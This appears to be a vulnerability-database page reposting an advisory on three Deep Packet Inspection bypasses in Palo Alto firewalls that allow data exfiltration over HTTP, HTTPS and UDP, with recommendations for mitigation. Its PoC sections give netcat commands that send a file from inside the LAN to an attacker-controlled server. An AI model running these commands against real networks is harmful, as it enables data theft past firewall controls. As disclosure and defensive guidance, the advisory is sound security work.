Vulners
Lucene search
đ Palo Alto Deep Packet Inspection Information Disclosure
đď¸Â 10 Dec 2025 00:00:00Reported by indoushkaType 
 packetstormđ packetstorm.newsđ 206 Views
=============================================================================================================================================
| # Title : Palo Alto Deep Packet Inspection (DPI) Critical Vulnerabilities in Mechanism |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.paloaltonetworks.com/network-security/pan-os |
=============================================================================================================================================
POC :
[+] Summary
3 vulnerabilities in Palo Alto Deep Packet Inspection mechanism
Advisory URL: https://pierrekim.github.io/advisories/2025-palo-alto-dpi.txt
Blog URL: https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html
[+] :: Product Description ::
------------------------------------------------------------
Palo Altoâs Next-Generation Firewalls provide advanced packet inspection technologies including Deep Packet Inspection (DPI).
They use App-ID technology to identify applications even when they attempt to evade detection through masquerading, port hopping, or encryption.
------------------------------------------------------------
[+] :: Vulnerability Summary ::
------------------------------------------------------------
Vulnerable versions: **All Palo Alto firewall versions**.
Versions tested (November 2024):
- PanOS 10.2.8 â vulnerable
- PanOS 10.2.9-h1 â vulnerable
- PanOS 11.1.4 â vulnerable
- PanOS 11.2.0 â vulnerable
[+] Three main vulnerabilities:
1. **Exfiltration of data via TCP/80 using âservice-httpâ**
2. **Exfiltration of data via TCP/443 using âservice-httpsâ**
3. **Exfiltration of data via UDP to any port and any IP**
- Includes PoC: client.py and server.py
[+] :: Impact ::
------------------------------------------------------------
An attacker within the LAN can:
- Bypass Deep Packet Inspection
- Exfiltrate sensitive data to any external IP
- Using HTTP, HTTPS, or UDP
- Without any filtering or blocking
This makes networks relying solely on DPI rules **highly vulnerable to data exfiltration attacks**.
------------------------------------------------------------
[+] :: Recommendations ::
------------------------------------------------------------
- Do not use DPI rules without specifying destination IP ranges.
- Always define IPv4/IPv6 ranges of allowed remote services.
- Use Palo Alto EDL when possible.
- Do not rely solely on App-ID to classify sensitive applications.
------------------------------------------------------------
[+] :: PoC Summary ::
------------------------------------------------------------
**Server (attacker on WAN) â listening on port 80:**
for i in $(seq 1 10); do nc -l -v -p 80 > exfiltration-http-$i; sleep 1; done
**Client (inside LAN) â sending random data:**
for i in $(seq 1 10); do nc -v <SERVER-IP> 80 < rand.hex; sleep 1.5; done
**Verification:**
sha256sum exfiltration-http-*
All received files match the original hash â confirming successful data exfiltration through the firewall.
------------------------------------------------------------
[+] :: Full Attack Execution (Working PoC) ::
------------------------------------------------------------
1. On the attacker/server side:
nc -l -v -p 80 > exfil-file
2. On the victim/client side inside LAN:
nc -v <SERVER-IP> 80 < file-to-exfiltrate.bin
3. The server receives the data despite DPI rules.
------------------------------------------------------------
[+] :: Conclusion ::
------------------------------------------------------------
The Deep Packet Inspection system in Palo Alto firewalls can be fully bypassed to leak data via HTTP/HTTPS/UDP without filtering.
Because the engine allows up to 256 KB before blocking, attackers can exfiltrate massive amounts of information.
**All networks relying solely on App-ID or DPI without strict IP-based rules are at severe risk of data exfiltration.**
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Dec 2025 00:00Current
7.2High risk
Vulners AI Score7.2